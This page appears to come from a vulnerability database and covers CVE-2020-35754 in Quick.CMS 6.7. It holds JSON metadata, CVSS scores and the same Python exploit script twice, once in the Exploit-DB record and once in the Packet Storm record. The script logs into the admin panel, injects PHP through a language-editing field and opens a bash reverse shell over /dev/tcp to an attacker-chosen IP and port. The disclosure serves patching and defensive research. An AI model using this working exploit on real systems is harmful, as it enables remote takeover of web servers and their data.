DATABASE
RESOURCES
PRICING
ABOUT US
Quick.CMS 6.7 - Remote Code Execution (Authenticated)
2021-01-29T00:00:00
Description
Related
packetstorm
exploit
Quick.CMS 6.7 Remote Code Execution
2021-01-29T00:00:00
cve
NVD
CVE-2020-35754
2021-01-28T20:15:00
{"id": "EDB-ID:49494", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "Quick.CMS 6.7 - Remote Code Execution (Authenticated)", "description": "", "published": "2021-01-29T00:00:00", "modified": "2021-01-29T00:00:00", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.2, "impactScore": 5.9}, "href": "https://www.exploit-db.com/exploits/49494", "reporter": "mari0x00", "references": [], "cvelist": ["CVE-2020-35754", "2020-35754"], "immutableFields": [], "lastseen": "2022-01-13T05:29:41", "viewCount": 110, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2020-35754"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:161189"]}], "rev": 4}, "score": {"value": 6.9, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2020-35754"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:161189"]}]}, "exploitation": null, "vulnersScore": 6.9}, "sourceHref": "https://www.exploit-db.com/download/49494", "sourceData": "# Exploit Title: Quick.CMS 6.7 - Remote Code Execution (Authenticated)\r\n# Date: 2020-12-28\r\n# Exploit Author: mari0x00\r\n# Vendor Homepage: https://opensolution.org/\r\n# Software Link: https://opensolution.org/download/?sFile=Quick.Cms_v6.7-pl.zip\r\n# Description: https://secator.pl/index.php/2021/01/28/cve-2020-35754-authenticated-rce-in-quick-cms-and-quick-cart/\r\n# Version: <= 6.7\r\n# CVE : CVE-2020-35754\r\n\r\n#!/usr/bin/python3\r\n\r\nimport requests\r\nimport sys\r\nfrom termcolor import colored\r\nfrom time import sleep\r\n\r\nprint(colored('''###########################################################''',\"red\"))\r\nprint(colored('''###### Quick.CMS authenticated RCE by mari0x00 #######''',\"red\"))\r\nprint(colored('''###########################################################''',\"red\"))\r\nprint(\"\")\r\n\r\nif len(sys.argv) != 6:\r\n print((colored(\"[~] Usage : python3 quickpwn.py <url> <username> <password> <IP> <PORT>\",\"red\")))\r\n print((colored(\"[~] Example: python3 quickpwn.py http://192.168.101.105/quick.cms/ john@example.com pass123 192.168.101.101 4444\",\"red\")))\r\n exit()\r\nurl = sys.argv[1]\r\nusername = sys.argv[2]\r\npassword = sys.argv[3]\r\nIP = sys.argv[4]\r\nPORT = sys.argv[5]\r\n\r\n\r\n#Start session\r\ns = requests.Session()\r\nheaders = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0'}\r\n\r\n\r\n#Authenticate\r\nprint((colored(\"[+] Attempting user login\",\"blue\")))\r\n\r\nlogin_data = {\r\n \"sEmail\": username,\r\n \"sPass\": password,\r\n \"bAcceptLicense\": \"1\",\r\n \"iAcceptLicense\": \"true\"\r\n }\r\n\r\nlogin = s.post(url+\"admin.php?p=login\", login_data, headers=headers)\r\nsleep(0.5)\r\n\r\n\r\n#Exploit\r\nprint((colored(\"[+] Adding shell command\",\"blue\")))\r\npayload = \"Back end\\\\\\\"; system('/bin/bash -c \\\\'bash -i >& /dev/tcp/\" + IP + \"/\" + PORT + \" 0>&1\\\\''); //\"\r\n\r\nshell = {\r\n \"sOption\": \"save\",\r\n \"Back_end_only\": payload\r\n}\r\n\r\nexploit = s.post(url+\"admin.php?p=languages&sLangEdit=en\", shell, headers=headers)\r\nsleep(1)\r\n\r\n#Triggering reverse shell (three times just in case)\r\nprint(\"\")\r\nprint((colored(\"[+] Triggering the shell. Go nuts!\",\"green\")))\r\nr = s.get(url+\"admin.php?p=languages\", headers=headers)\r\nsleep(1)\r\nr = s.get(url+\"admin.php?p=languages\", headers=headers)\r\nsleep(1)\r\nr = s.get(url+\"admin.php?p=languages\", headers=headers)", "osvdbidlist": [], "exploitType": "webapps", "verified": false, "_state": {"dependencies": 1646149902}}
{"packetstorm": [{"lastseen": "2021-01-29T13:22:55", "description": "", "published": "2021-01-29T00:00:00", "type": "packetstorm", "title": "Quick.CMS 6.7 Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-35754"], "modified": "2021-01-29T00:00:00", "id": "PACKETSTORM:161189", "href": "https://packetstormsecurity.com/files/161189/Quick.CMS-6.7-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: Quick.CMS 6.7 - Remote Code Execution (Authenticated) \n# Date: 2020-12-28 \n# Exploit Author: mari0x00 \n# Vendor Homepage: https://opensolution.org/ \n# Software Link: https://opensolution.org/download/?sFile=Quick.Cms_v6.7-pl.zip \n# Description: https://secator.pl/index.php/2021/01/28/cve-2020-35754-authenticated-rce-in-quick-cms-and-quick-cart/ \n# Version: <= 6.7 \n# CVE : CVE-2020-35754 \n \n#!/usr/bin/python3 \n \nimport requests \nimport sys \nfrom termcolor import colored \nfrom time import sleep \n \nprint(colored('''###########################################################''',\"red\")) \nprint(colored('''###### Quick.CMS authenticated RCE by mari0x00 #######''',\"red\")) \nprint(colored('''###########################################################''',\"red\")) \nprint(\"\") \n \nif len(sys.argv) != 6: \nprint((colored(\"[~] Usage : python3 quickpwn.py <url> <username> <password> <IP> <PORT>\",\"red\"))) \nprint((colored(\"[~] Example: python3 quickpwn.py http://192.168.101.105/quick.cms/ john@example.com pass123 192.168.101.101 4444\",\"red\"))) \nexit() \nurl = sys.argv[1] \nusername = sys.argv[2] \npassword = sys.argv[3] \nIP = sys.argv[4] \nPORT = sys.argv[5] \n \n \n#Start session \ns = requests.Session() \nheaders = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0'} \n \n \n#Authenticate \nprint((colored(\"[+] Attempting user login\",\"blue\"))) \n \nlogin_data = { \n\"sEmail\": username, \n\"sPass\": password, \n\"bAcceptLicense\": \"1\", \n\"iAcceptLicense\": \"true\" \n} \n \nlogin = s.post(url+\"admin.php?p=login\", login_data, headers=headers) \nsleep(0.5) \n \n \n#Exploit \nprint((colored(\"[+] Adding shell command\",\"blue\"))) \npayload = \"Back end\\\\\\\"; system('/bin/bash -c \\\\'bash -i >& /dev/tcp/\" + IP + \"/\" + PORT + \" 0>&1\\\\''); //\" \n \nshell = { \n\"sOption\": \"save\", \n\"Back_end_only\": payload \n} \n \nexploit = s.post(url+\"admin.php?p=languages&sLangEdit=en\", shell, headers=headers) \nsleep(1) \n \n#Triggering reverse shell (three times just in case) \nprint(\"\") \nprint((colored(\"[+] Triggering the shell. Go nuts!\",\"green\"))) \nr = s.get(url+\"admin.php?p=languages\", headers=headers) \nsleep(1) \nr = s.get(url+\"admin.php?p=languages\", headers=headers) \nsleep(1) \nr = s.get(url+\"admin.php?p=languages\", headers=headers) \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/161189/quickcms67-exec.txt"}], "cve": [{"lastseen": "2022-03-23T17:58:44", "description": "OpenSolution Quick.CMS < 6.7 and Quick.Cart < 6.7 allow an authenticated user to perform code injection (and consequently Remote Code Execution) via the input fields of the Language tab.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-28T20:15:00", "type": "cve", "title": "CVE-2020-35754", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-35754"], "modified": "2021-07-21T11:39:00", "cpe": [], "id": "CVE-2020-35754", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-35754", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}]}